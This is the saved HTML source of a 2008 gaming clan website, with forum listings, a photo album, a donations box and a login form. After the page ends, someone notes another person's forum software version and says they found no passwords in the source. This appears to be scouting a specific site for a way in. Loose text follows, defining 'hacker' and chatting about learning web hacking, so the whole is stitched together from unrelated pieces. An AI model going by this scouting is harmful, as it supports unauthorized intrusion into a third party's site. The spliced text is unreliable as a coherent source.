<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=119">Eaglestrike</a></td>
<td align="center" class="row2">22</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 13, 2008 at 01:26:25&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=7">LCN_CHRINOR</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12608#12608"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>

<td width="100%" class="row1">&nbsp;<b>COD 4</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12602#12602">The famed 2v2 showdown</a></td>
<td align="center" class="row2">9</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a></td>
<td align="center" class="row2">39</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 12, 2008 at 15:56:04&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12602#12602"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>

</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>COD 4</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12598#12598">New CoD4 Server</a></td>
<td align="center" class="row2">13</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=127">LCN_Frag</a></td>
<td align="center" class="row2">64</td>

<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 11, 2008 at 19:12:42&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=12">LCN_DeadMeat</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12598#12598"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>Gen Discussion / Current Events</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12597#12597">My new PC</a></td>
<td align="center" class="row2">8</td>

<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=7">LCN_CHRINOR</a></td>
<td align="center" class="row2">39</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 11, 2008 at 11:08:55&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=7">LCN_CHRINOR</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12597#12597"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>

<td width="100%" class="row1">&nbsp;<b>Unreal Tournament</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12593#12593">Sup Guys.. Long time No see....</a></td>
<td align="center" class="row2">14</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=167">wSpMercy</a></td>
<td align="center" class="row2">77</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 10, 2008 at 19:00:15&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=7">LCN_CHRINOR</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12593#12593"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>

</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>COD 4</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12582#12582">Call of Duty 5 announced</a></td>
<td align="center" class="row2">1</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a></td>
<td align="center" class="row2">10</td>

<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 09, 2008 at 08:55:45&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=2">LCN_Hagii</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12582#12582"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>Sporting Talk</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12578#12578">Football MMORPG</a></td>
<td align="center" class="row2">24</td>

<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=119">Eaglestrike</a></td>
<td align="center" class="row2">167</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 08, 2008 at 19:33:17&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12578#12578"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>

<td width="100%" class="row1">&nbsp;<b>Et Al</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12574#12574">Team Fortress 2</a></td>
<td align="center" class="row2">19</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=11">Sue</a></td>
<td align="center" class="row2">171</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 07, 2008 at 16:11:06&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12574#12574"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>

</tr> <tr>
<td height="28" colspan="6" align="center" class="cat">&nbsp;</td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

</tr>
<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>
</tr></table>
<br><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>
</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td valign="top" bgcolor="#000000">
<center><font class="title"><b>|LCN| La Cosa Nostra: Album</b></font></center> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>

<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>
</tr></table>
<br><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>

</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td valign="top" bgcolor="#000000">
<br><center><font class="title"></font> <a class="title" href="modules.php?op=modload&name=Album&file=index">Index</a> <font class="title">&nbsp;&nbsp;&nbsp;</font> <a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=top">Top 10</a> <font class="title">&nbsp;&nbsp;&nbsp;</font> <a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=upload">Submit Media</a> <font class="title"></font><br><font class="tiny">145 Mediafiles</font></center><br><br><table border="0" width="100%" align="center" cellpadding="2"><tr><td align="center" valign="top" width="33.333333333333%"><table align="center">

<tr>
<td colspan="2">
<a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=6">Battlefield 2 / 2142</a> <font class="content">(29) </font>
</td>
</tr>
<tr>
<td>
<a class=content href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=6"><img src="modules/Album/album/bf2/bf2.gif" alt="Battlefield 2 / 2142" width="68" height="90" border="0"></a>
</td>

<td valign="top" align="left">
<font class=content>Battlefield 2 & 2142</font>
</td>
</tr>
</table></td><td align="center" valign="top" width="33.333333333333%"><table align="center">
<tr>
<td colspan="2">
<a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=7">Hall Of Fame</a> <font class="content">(15) </font>

</td>
</tr>
<tr>
<td>
<a class=content href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=7"><img src="modules/Album/album/hof/oldlogo.gif" alt="Hall Of Fame" width="128" height="101" border="0"></a>
</td>
<td valign="top" align="left">
<font class=content>LCN Hall Of Fame</font>
</td>

</tr>
</table></td><td align="center" valign="top" width="33.333333333333%"><table align="center">
<tr>
<td colspan="2">
<a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=4">Other Games</a> <font class="content">(44) </font>
</td>
</tr>
<tr>
<td>
<a class=content href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=4"><img src="modules/Album/album/og/othergames.gif" alt="Other Games" width="75" height="73" border="0"></a>

</td>
<td valign="top" align="left">
<font class=content>Screen Shots of Other Games</font>
</td>
</tr>
</table></td></tr><tr><td align="center" valign="top" width="33.333333333333%"><table align="center">
<tr>
<td colspan="2">
<font class="title">Personal Pics</font> <font class="content">(12) <font class="tiny">(*)</font></font>

</td>
</tr>
<tr>
<td>
<img src="modules/Album/album/..imagesalbumpers/icon_home.gif" alt="Personal Pics" width="20" height="20" border="0">
</td>
<td valign="top" align="left">
<font class=content>Any personal Pics you guys would like to share.</font>
</td>

</tr>
</table></td><td align="center" valign="top" width="33.333333333333%"><table align="center">
<tr>
<td colspan="2">
<a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=1">Unreal Tournament</a> <font class="content">(38) </font>
</td>
</tr>
<tr>
<td>
<a class=content href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=1"><img src="modules/Album/album/imagesablum/Resize of blgold.jpg" alt="Unreal Tournament" width="57" height="58" border="0"></a>

</td>
<td valign="top" align="left">
<font class=content>UT Related pics</font>
</td>
</tr>
</table></td><td align="center" valign="top" width="33.333333333333%"><table align="center">
<tr>
<td colspan="2">
<a class="title" href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=2">UT 2K4</a> <font class="content">(7) </font>

</td>
</tr>
<tr>
<td>
<a class=content href="modules.php?op=modload&name=Album&file=index&amp;do=showgall&amp;gid=2"><img src="modules/Album/album/imagesablum2k4/Resize of ut2k4logo1.jpg" alt="UT 2K4" width="82" height="25" border="0"></a>
</td>
<td valign="top" align="left">
<font class=content>2K4 related pics</font>
</td>

</tr>
</table></td></tr><tr></tr><tr><td colspan="3" align="center"><br><font class=""><i>If you want to access categories marked with a (*), you have to <a href="modules.php?name=Your_Account&op=new_user">Register</a> first!</i></font></td></tr></table> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>
</tr></table>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>
</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

<td valign="top" bgcolor="#000000">
<center><font class="option"><b>Where R U ?</b></font></center><br><center> <div><embed quality="high" type="application/x-shockwave-flash" src="http://www.frappr.com/ajax/yvmap.swf" flashvars="host=http://www.frappr.com/&origin=myspace&lo=1&mvid=137440385748" salign="l" align="middle" scale="noscale" width="500" height="300" ></embed><div style="width:400px;text-align:left;"><a href="http://visitor.frappr.com/?sig=visitor_map&src_mvid=137440385748&origin=myspace" target=_blank><img src="http://frappr.com/i/gyo.gif" border=0/></a><a href="http://www.frappr.com/?a=constellation_map&mapid=137440305199&src=flash_map&sig=visitor_map&src_mvid=137440385748&origin=myspace&ct=seemore" target=_blank><img src="http://frappr.com/i/s.gif" border=0/></a><a href="http://www.frappr.com/?a=constellation_map&mapid=137440305199&src=flash_map&sig=visitor_map&src_mvid=137440385748&origin=myspace&ct=pendingpins" target=_blank><img src="http://frappr.com/dyn_map/137440305199/origin:myspace/p.gif" border=0/></a><a href="http://www.frappr.com/?a=feedback&type=vm" target=_blank><img src="http://frappr.com/i/h.gif" border=0/></a></div></div> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>

</tr></table>
<br></td>
<td width="5" valign="top"><img src="themes/BF2/images/spacer.gif" width="5" height="0" border="0"></td>
<td width="180" valign="top">
<table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>Shopping !</b></font></td>
</tr>
</table></td>
</tr>
<tr>

<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content"><center><a href="http://www.anrdoezrs.net/click-2811252-10440262" target="_blank">
<img src="http://www.ftjcfx.com/image-2811252-10440262" width="125" height="125" alt="Once You Know, You Newegg" border="0"/></a> <br>
<a href="http://www.jdoqocy.com/click-2811252-10514238" target="_blank">
<img src="http://www.tqlkg.com/image-2811252-10514238" width="150" height="50" alt="That's correct....absolutely no Shipping Fee" border="0"/></a>
</center></font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>

</td>
</tr>
</table><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>

<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>|LCN| Donations</b></font></td>
</tr>
</table></td>
</tr>
<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">

<tr>
<td><font class="content"><script type="text/javascript">
<!-- asdfasdf -->
function openwindownt(){
window.open ("modules/Donations/info.html","NukeTreasury","toolbar=no,location=no,directories=no,status=no,scrollbars=no,resizable=no,copyh istory=no,width=440,height=330");
}
</script><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td width="100%" colspan="2" align="center"><b>HELP KEEP |LCN| SERVERS ONLINE!</b></td></tr><tr><td width="100%" colspan="2" align="center"><a href="modules.php?name=Donations"><img src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" border="0" alt="Make donations with PayPal!" align="center"></a></td></tr><tr><td width="100%" align="center" colspan="2"><u><b>Donat-o-Meter Stats</b></u></td></tr><tr><td width="105" align="right">May&acute;s Goal:</td><td align="left">$100.00</td></tr><tr><td width="105" align="right">Due Date:</td><td align="left">&nbsp; May 31</td></tr><tr><td width="105" align="right">Gross Amount:</td><td align="left">$0.00</td></tr><tr><td width="105" align="right">Net Balance:</td><td align="left">$0.00</td></tr><tr><td width="105" align="right"><b>Left to go:</b></td><td align="left"> <b>$100.00</b></td></tr></table><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td width="100%"><hr></td></tr><tr><td align="center"><b><u><a href="jopenwindownt()">Donations &copy;</a></u></b></td></tr></table></font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>
</table></td>
</tr>

</table></td>
</tr>
</table>
</td>
</tr>
</table>




<table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">

<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>|LCN| User Info</b></font></td>

</tr>
</table></td>
</tr>
<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content"><form action="modules.php?name=Your_Account" method="post"><div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%><tr><td width="100%" height="10"></td></tr><tr><td width="100%">
<center><img src="modules/Forums/images/avatars/blank.gif" alt=""></center></td></tr>
<tr><td width="100%" height="10"></td></tr>
<tr><td width="100%"><center><b>Welcome Anonymous</b></center></td></tr></table></div><hr noshade size=1>

<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
<tr><td width="100%">&nbsp;<img align="absmiddle" src=images/blocks/ball_g.gif>&nbsp;<a href="modules.php?name=Your_Account&amp;op=new_user">Register</a></td></tr>
<tr><td width="100%" height="5"></td></tr>
<tr><td width="100%">&nbsp;<img align="absmiddle" src=images/blocks/ball_r.gif>&nbsp;<a href="modules.php?name=Your_Account&amp;op=pass_lost">Forgot Password?</a></td></tr></table></div><hr noshade size=1><div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%><tr><td width="100%">
<center>Nickname<br><input type="text" name="username" size="13" maxlength="25"><br>Password<br><input type="password" name="user_password" size="13" maxlength="20"><br><input type="hidden" name="random_num" value="165005"><input type="hidden" name="gfx_check" value="7105323441"><input type="hidden" name="op" value="login">&nbsp;<input type="submit" value="Go"></center><input type="hidden" name="redirect" value=><input type="hidden" name="mode" value=><input type="hidden" name="f" value=><input type="hidden" name="t" value=></tr></table></div><hr noshade size=1>
<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
<tr><td width="100%" colspan="2"><img src="images/blocks/group.gif" height="16" width="17" align="absmiddle"> <u><b>Membership</b></u><br><img src=images/blocks/spacer.gif border=0></td></tr>
<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;New Today</td>
<td width="10%"><p align="right"><b>0</b></td></tr>

<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;New Yesterday</td>
<td width="10%"><p align="right"><b>0</b></td></tr>
<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Overall</td>
<td width="10%"><p align="right"><b>90</b></td></tr>
</tr></table></div><hr noshade size=1>
<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
<tr><td width="100%"><img src="images/blocks/group.gif" height="16" width="17" align="absmiddle"> <b><u>Latest 3 Members</u></b><br><img src=images/blocks/spacer.gif border=0></td></tr>
<tr><td width="100%">&nbsp;01:<img src="images/blocks/gold.gif" border=0 align="center" ALT="May 11, 2008"><a title="May 11, 2008" href="modules.php?name=Forums&file=profile&mode=viewprofile&u=168">webbez</a></td></tr>
<tr><td width="100%">&nbsp;02:<img src="images/blocks/gold.gif" border=0 align="center" ALT="Apr 30, 2008"><a title="Apr 30, 2008" href="modules.php?name=Forums&file=profile&mode=viewprofile&u=167">wSpMercy</a></td></tr>

<tr><td width="100%">&nbsp;03:<img src="images/blocks/gold.gif" border=0 align="center" ALT="Apr 29, 2008"><a title="Apr 29, 2008" href="modules.php?name=Forums&file=profile&mode=viewprofile&u=166">devilthanh</a></td></tr>
</table></div><hr noshade size=1>
<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
<tr><td width="100%" colspan="2"><img src="images/blocks/group.gif" height="16" width="17" align="absmiddle"> <b><u>People Online</u></b><br><img src=images/blocks/spacer.gif border=0><br><img src=images/blocks/spacer.gif border=0></td></tr>
<tr><td width="85%"><p align="left">&nbsp;<img src="images/blocks/guest.gif" width="14" height="14" align="absmiddle"><b>Visitors</b> (100%)</td>
<td width="15%"><p align="right"><b>4</b></td></tr>
<tr><td width="100%" colspan="2">&nbsp;01:&nbsp;88.148.216.XX
&nbsp;02:&nbsp;209.131.56.XX
&nbsp;03:&nbsp;71.56.254.XX
&nbsp;04:&nbsp;66.231.188.XXX

<br><img src=images/blocks/space.gif border=0></td></tr>
<tr><td width="85%"><p align="left">&nbsp;<img src="images/blocks/member.gif" width="14" height="14" align="absmiddle"><b>Members</b> (0%)</td>
<td width="15%"><p align="right"><b>0</b></td></tr>
<tr><td width="100%" colspan="2"><img src=images/blocks/space.gif border=0></td></tr>
<tr><td width="100%" colspan="2"><img src=images/blocks/space.gif border=0></td></tr>
<tr><td width="90%"><p align="left">&nbsp;<img src="images/blocks/admin.gif" width="14" height="14" align="absmiddle"><b>Total online</b></td>
<td width="10%"><p align="right"><b>4</b></td></tr>
</table></div><hr noshade size=1>
<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
<tr><td width="100%" colspan="2"><img src="images/blocks/group.gif" height="16" width="17" align="absmiddle"> <b><u>Most Ever Online</u></b><br><img src=images/blocks/spacer.gif border=0></td></tr>

<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Total</td>
<td width="10%"><p align="right"><b>341</b></td></tr>
<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Members</td>
<td width="10%"><p align="right"><b>0</b></td></tr>
<tr><td width="90%"><p align="left">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Visitors</td>
<td width="10%"><p align="right"><b>341</b></td></tr>
</table></div>
<hr noshade size=1><div align="center"><table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width=98%>
<tr><td width="100%" colspan="2"><img src="images/blocks/stats.gif" height="16" width="17" align="absmiddle"> <b><u>Total Hits</u></b><br><img src=images/blocks/spacer.gif border=0></td></tr>

<tr><td width="65%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Daily</td>
<td width="35%"><p align="right"><b><a href="modules.php?name=Statistics&op=DailyStats&year=2008&month=5&date=14">147</a></b></td></tr>
<tr><td width="65%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Average Hits</td>
<td width="35%"><p align="right"><b><a href="modules.php?name=Statistics&op=DailyStats&year=2008&month=5&date=13">231</a></b></td></tr>
<tr><td width="65%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Total Hits</td>
<td width="35%"><p align="right"><b><a href="modules.php?name=Statistics">736499</a></b></td></tr>
</table><hr noshade size=1>
<div align="center"><table border="0" cellpadding="0" cellspacing="0" width=98%>
&nbsp;<img src="images/blocks/sitenuke.gif" border="0"> &nbsp;<b><u>|LCN| Site Info</u></b><br /><tr><td width="90%">&nbsp;<strong><big>&middot;</big></strong>Active Staff</td>

<td width="10%"><p align="right"><b>3</b></td></tr>
<tr><td width="90%">&nbsp;<strong><big>&middot;</big></strong><a href=modules.php?name=Topics>Active Topics</td>
<td width="10%"><p align="right"><b>13</b></td></tr>
<tr><td width="90%">&nbsp;<strong><big>&middot;</big></strong><a href=modules.php?name=News>Active Stories</td>
<td width="10%"><p align="right"><b>11</b></td></tr>
<tr><td width="90%">&nbsp;<strong><big>&middot;</big></strong><a href=modules.php?name=Forums>Forum Posts</td>
<td width="10%"><p align="right"><b>12566</b></td></tr>
<tr><td width="90%">&nbsp;<strong><big>&middot;</big></strong><a href=modules.php?name=Forums>Forum Topics</td>
<td width="10%"><p align="right"><b>1229</b></td></tr>

</table></div>
<hr noshade size=1><table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width=98%>
<tr><td width="100%" colspan="2"><img src="images/blocks/time.gif" height="16" width="17" align="absmiddle"> <b><u>Server Time</u></b><br><img src=images/blocks/spacer.gif border=0></td></tr>
<tr><td width="35%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Time</td>
<td width="65%"><p align="right">08:46:33
</td></tr>
<tr><td width="35%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Date</td>
<td width="65%"><p align="right">14/05/08</td></tr>
<tr><td width="35%">&nbsp;<strong><big>&middot;</big></strong>&nbsp;Timezone</td>
<td width="65%"><p align="right">GMT -8<br><img src=images/blocks/spacer.gif border=0></td></tr>

</form></table></div>
</font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>
</table></td>

</tr>
</table></td>
</tr>
</table>
</td>
</tr>
</table></td>
</tr>
</table>
<script language="javascript" src="themes/BF2/hover.js"></script>
<TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0> <TR> <TD width="30%" background="themes/BF2/images/footer1.gif"> </TD> <TD>

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="769" HEIGHT="62" id="footer" ALIGN="">
<PARAM NAME=movie VALUE="themes/BF2/images/footer.swf"> <PARAM NAME=quality VALUE=best> <PARAM NAME=wmode VALUE=transparent> <PARAM NAME=bgcolor VALUE=#FFFFFF> <EMBED src="themes/BF2/images/footer.swf" menu=false quality=best wmode=transparent bgcolor=#E1E9F2 WIDTH="769" HEIGHT="62" NAME="nav" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
</OBJECT>
</TD> <TD width="30%" background="themes/BF2/images/footer1.gif"> </TD> </TR></TABLE></body>
</html>
He is using v6.01.15he is going to get v7.0 soon this is the dorum website that he uses I did not see any passwordss on this page ?
http://www.php-fusion.co.uk/news.php Unsure

This is his ISO: text/html; charset=iso-8859-1
A hacker is a person who reverse engineers software and penetrates security systems.

Generally crackers penetrate systems and hackers reverse engineer software although in many cases these terms are interchangable and are often used the other way around.

A hacker can also be defined as a set of people who intend to invade the privacy of a network.

The definement of a hacker is considered to be one who has internal knowledge based upon his or her years of practice. Understanding the fundamentals of hacking can bring to a mind of successfully reverting code and making something that was once one way is now something totally different.

UPDATE: 9/4/07 - Dapallox1

What you say is correct in some terms, but not all. Hackers are not only people who reverse engineer software and penetrate security systems. Those are called "Black-Hat" hackers. "White-Hat" hackers do the same except, they do it to help. Then there are just hackers. To hack is to modify something to your liking. Whether it be making your CD-ROM/DVD-ROM drive come out faster, or jumping up your RPMs on your car. Or taking apart a DVD burner and creating a high-powered laser out of it. That is all hacking
WhistleOmg
PHP and MySQL is kinda essential for learning web hacking. Tho there is SO much more then just those two categories within web hacking
Ohh yea, html.. xD kinda learned that just by looking at websites sources (i thought it was you know like built into human brains xD)
